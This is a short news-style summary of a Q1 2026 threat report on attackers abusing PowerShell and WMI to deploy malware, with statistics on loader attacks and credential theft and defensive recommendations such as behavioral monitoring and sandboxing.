Cybercriminals Exploit Trusted Tools for Malware Deployment

Cybercriminals are increasingly using legitimate system tools like PowerShell and WMI to deploy malware, creating stealthy threats that evade traditional defenses. The ANY.RUN Q1 2026 Cyber Risk report highlights a significant rise in loader-based attacks, which nearly doubled, alongside a 14.7% increase in credential theft and a 58.4% rise in Living-off-the-Land techniques. Attackers leverage these trusted tools to establish persistence quickly, with median times of just 21 seconds. This trend complicates detection efforts, as legitimate tools generate benign telemetry that can obscure malicious activity. Organizations are urged to adopt behavioral monitoring and anomaly detection to identify subtle deviations in command usage. The report emphasizes the importance of rapid sandboxing and threat intelligence to mitigate the impact of these attacks. As attackers continue to exploit trusted tools, the need for robust detection and response strategies becomes critical.

Key Points: • Cybercriminals are using trusted system tools to deploy malware stealthily. • Loader-based attacks nearly doubled in Q1 2026, complicating detection efforts. • Organizations must enhance behavioral monitoring to identify malicious use of legitimate tools.